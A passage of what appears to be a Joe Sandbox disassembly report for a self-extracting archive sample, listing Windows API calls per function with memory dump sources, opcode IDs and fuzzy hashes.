                                                                                                                        • Instruction ID: 21ce911dfd219f098721fa87dc7cb33acccfe47078a5bc84e88895249e1bf855
                                                                                                                        • Opcode Fuzzy Hash: ac4c11d8bce61036f9de42574a6fba6178c6f890beb563e1e53f0a20a4307bec
                                                                                                                        • Instruction Fuzzy Hash: 1DF0F9B1900209AFCB10AFAAD9499EFFBFCEF95700F00415AA415F2241DBB45606CBA1

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00E97760,?,00000005,?,00000011), ref: 00E9995F
                                                                                                                        • GetLastError.KERNEL32(?,?,00E97760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E9996C
                                                                                                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00E97760,?,00000005,?), ref: 00E999A2
                                                                                                                        • GetLastError.KERNEL32(?,?,00E97760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E999AA
                                                                                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00E97760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E999F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateErrorLast$Time
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1999340476-0
                                                                                                                        • Opcode ID: 1726cb54d78d7dec97d68284a47a450fd484bca4745d47e5e416384733f31621
                                                                                                                        • Instruction ID: 84460df5c7b84852493851bb2392ba46555576b79f82a4fecc20b7593ceeef56
                                                                                                                        • Opcode Fuzzy Hash: 1726cb54d78d7dec97d68284a47a450fd484bca4745d47e5e416384733f31621
                                                                                                                        • Instruction Fuzzy Hash: 723157315443416FEB309F28CC46BDABBD4BB85324F101B1DF9A1B61C2D3B5A988CB90

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EAB579
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB58A
                                                                                                                        • IsDialogMessageW.USER32(0001043A,?), ref: 00EAB59E
                                                                                                                        • TranslateMessage.USER32(?), ref: 00EAB5AC
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00EAB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1266772231-0
                                                                                                                        • Opcode ID: 51b2fd7b9d60a1aa9e1772cce65567f548f85f710018e933fb46bc3774e29548
                                                                                                                        • Instruction ID: fe6ce8e52d640aaa9a4d9cdd161a22fa02f4ee22b0bd9d2dc0bcc92c1967e783
                                                                                                                        • Opcode Fuzzy Hash: 51b2fd7b9d60a1aa9e1772cce65567f548f85f710018e933fb46bc3774e29548
                                                                                                                        • Instruction Fuzzy Hash: 95F0A971E0111AAA8B209BB6AC4CDEB7FACEF462957404416B515E2011EF24E609CBB0

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000050), ref: 00EAABC2
                                                                                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 00EAABF9
                                                                                                                          • Part of subcall function 00EA1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E9C116,00000000,.exe,?,?,00000800,?,?,?,00EA8E3C), ref: 00EA1FD1
                                                                                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00EAABE9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                        • String ID: EDIT
                                                                                                                        • API String ID: 4243998846-3080729518
                                                                                                                        • Opcode ID: 9a209b16c5a8fecf3ef127132df44f702b901d2e331d3e494548e6dd5635c727
                                                                                                                        • Instruction ID: cd52f8e4863dc446ff5d1aa33cf5ed52c5491b672c0cc321d955604da90395c3
                                                                                                                        • Opcode Fuzzy Hash: 9a209b16c5a8fecf3ef127132df44f702b901d2e331d3e494548e6dd5635c727
                                                                                                                        • Instruction Fuzzy Hash: 1FF082327013287ADB2057259C09FAF76AC9F8BB40F485066BA05B61C0DB60EA85C5B6

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EADBF4
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EADC30
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                        • String ID: sfxcmd$sfxpar
                                                                                                                        • API String ID: 1431749950-3493335439
                                                                                                                        • Opcode ID: 9bc6aa97433bba62f36119e2f4050aa6f73298bbbd5b8fff1d7e5cf47520a193
                                                                                                                        • Instruction ID: 7800ccbb09d9883d652f64742cc2a1ff125d1fc28ec2b5617796280909bf089a
                                                                                                                        • Opcode Fuzzy Hash: 9bc6aa97433bba62f36119e2f4050aa6f73298bbbd5b8fff1d7e5cf47520a193
                                                                                                                        • Instruction Fuzzy Hash: 92F054B24053247FCB101F958C05FFA7798EF0D7517441014BD45BD041D6B1A941D6B0

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00E99795
                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00E997AD
                                                                                                                        • GetLastError.KERNEL32 ref: 00E997DF
                                                                                                                        • GetLastError.KERNEL32 ref: 00E997FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2244327787-0
                                                                                                                        • Opcode ID: 6b6a71c85ec56b8cf0f02b0f50cf5cf139670baec0bc66c4be3ca7d81c6de348
                                                                                                                        • Instruction ID: efe6c17c6402f7063c712dd4709a491fd700e53d91162145498bb6bc7c162f96
                                                                                                                        • Opcode Fuzzy Hash: 6b6a71c85ec56b8cf0f02b0f50cf5cf139670baec0bc66c4be3ca7d81c6de348
                                                                                                                        • Instruction Fuzzy Hash: 4B11C231910204EBCF345FBDC804AA937A9FB06325F10952EF826B5192DB758E44DB61
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00EB3F73,00000000,00000000,?,00EBACDB,00EB3F73,00000000,00000000,00000000,?,00EBAED8,00000006,FlsSetValue), ref: 00EBAD66
                                                                                                                        • GetLastError.KERNEL32(?,00EBACDB,00EB3F73,00000000,00000000,00000000,?,00EBAED8,00000006,FlsSetValue,00EC7970,FlsSetValue,00000000,00000364,?,00EB98B7), ref: 00EBAD72
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00EBACDB,00EB3F73,00000000,00000000,00000000,?,00EBAED8,00000006,FlsSetValue,00EC7970,FlsSetValue,00000000), ref: 00EBAD80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: 50da4ab81959231136bf32af5a4d1e11b65beaab4862fed383801b4b95d00945
                                                                                                                        • Instruction ID: 21053928111f6660cc878b24465e48b5b19d05bf1816088a0c9eb58a8d9d6d89
                                                                                                                        • Opcode Fuzzy Hash: 50da4ab81959231136bf32af5a4d1e11b65beaab4862fed383801b4b95d00945
                                                                                                                        • Instruction Fuzzy Hash: 4D012432201222AFCF224F79DC44EDB7B58EF407AA7180230F916F3560CB21C806C6E1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EB97E5: GetLastError.KERNEL32(?,00ED1030,00EB4674,00ED1030,?,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EB97E9
                                                                                                                          • Part of subcall function 00EB97E5: _free.LIBCMT ref: 00EB981C
                                                                                                                          • Part of subcall function 00EB97E5: SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB985D
                                                                                                                          • Part of subcall function 00EB97E5: _abort.LIBCMT ref: 00EB9863
                                                                                                                          • Part of subcall function 00EBBB4E: _abort.LIBCMT ref: 00EBBB80
                                                                                                                          • Part of subcall function 00EBBB4E: _free.LIBCMT ref: 00EBBBB4
                                                                                                                          • Part of subcall function 00EBB7BB: GetOEMCP.KERNEL32(00000000,?,?,00EBBA44,?), ref: 00EBB7E6
                                                                                                                        • _free.LIBCMT ref: 00EBBA9F
                                                                                                                        • _free.LIBCMT ref: 00EBBAD5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorLast_abort
                                                                                                                        • String ID: p
                                                                                                                        • API String ID: 2991157371-2678736219
                                                                                                                        • Opcode ID: 28fffff237f08946a7fff0457f97591cce8e4ab5e2b557a3e9037cca246f8b80
                                                                                                                        • Instruction ID: fe9372350e9d872ed440ec7d6511ad69203f921ada6cf06a6533964e79a8a661
                                                                                                                        • Opcode Fuzzy Hash: 28fffff237f08946a7fff0457f97591cce8e4ab5e2b557a3e9037cca246f8b80
                                                                                                                        • Instruction Fuzzy Hash: AC319131D04209AFDB10EFA9D541BDFB7E5EF40324F25509AE904BB2A2EBB29D41DB50
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: ($PDu<
                                                                                                                        • API String ID: 1269201914-2719109745
                                                                                                                        • Opcode ID: a3178e9412e70d44715e11a282f1fecc518a8ab838216f291dcecbd39addc977
                                                                                                                        • Instruction ID: 5c7ec5f0d9fdf983dc4b7489fdcfc7d97043cfc0494ec75424341aefe0be763e
                                                                                                                        • Opcode Fuzzy Hash: a3178e9412e70d44715e11a282f1fecc518a8ab838216f291dcecbd39addc977
                                                                                                                        • Instruction Fuzzy Hash: DBB012C1A581407C310861182F03D3F054DC1CBF14330B02FF508F8680EC812D020431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: 2$PDu<
                                                                                                                        • API String ID: 1269201914-683690134
                                                                                                                        • Opcode ID: 270654e7f32af84c117f9fe0717dd72637fdf532725a19c3835cfb3b55a83e0f
                                                                                                                        • Instruction ID: 33bc47f0b981cf8af0452464576420be5a6e7399a6aeaf95dd99c62acb724c3b
                                                                                                                        • Opcode Fuzzy Hash: 270654e7f32af84c117f9fe0717dd72637fdf532725a19c3835cfb3b55a83e0f
                                                                                                                        • Instruction Fuzzy Hash: D6B012C1A581007D310861182E03E3F014DC1CBF14330702FF408F86C0EC802D010431
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00E9D343,00000001,?,?,?,00000000,00EA551D,?,?,?), ref: 00E99F9E
                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00EA551D,?,?,?,?,?,00EA4FC7,?), ref: 00E99FE5
                                                                                                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00E9D343,00000001,?,?), ref: 00E9A011
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite$Handle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4209713984-0
                                                                                                                        • Opcode ID: ee86806df69989505392a96887e6b4eb9bf855dd8de3f51251fde413f6eedfe8
                                                                                                                        • Instruction ID: d6cedd3cbbf6a899df8db4e4b413aed14ad9167be9bfee7df36554696a82d49c
                                                                                                                        • Opcode Fuzzy Hash: ee86806df69989505392a96887e6b4eb9bf855dd8de3f51251fde413f6eedfe8
                                                                                                                        • Instruction Fuzzy Hash: 18318F31204305AFDF14CF24D818BBAB7A5EF84715F08552DF985BB290C775AD49CBA2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9C27E: _wcslen.LIBCMT ref: 00E9C284
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A2D9
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A30C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A329
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2260680371-0
                                                                                                                        • Opcode ID: b219614113ba35d5a0c364093011c9a80257d5c8148684c77fe952e0c8e6b9d9
                                                                                                                        • Instruction ID: bc51f969ed6d10b1e3163e0d742e38d1dcaffbc3d10949e42c05a7676493f392
                                                                                                                        • Opcode Fuzzy Hash: b219614113ba35d5a0c364093011c9a80257d5c8148684c77fe952e0c8e6b9d9
                                                                                                                        • Instruction Fuzzy Hash: B301B132600210AAEF21EB758C0ABED32889F0A788F1C5438F901F6191DB64DA81C6F2
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00EBB8B8
                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Info
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                        APIs
                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00EBAFDD
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: String
                                                                                                                        • String ID: LCMapStringEx
                                                                                                                        • API String ID: 2568140703-3893581201
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00EBA56F), ref: 00EBAF55
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                        • API String ID: 2593887523-3084827643
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Alloc
                                                                                                                        • String ID: FlsAlloc
                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAEAF9
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: 3Oo
                                                                                                                        • API String ID: 1269201914-2812179900
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
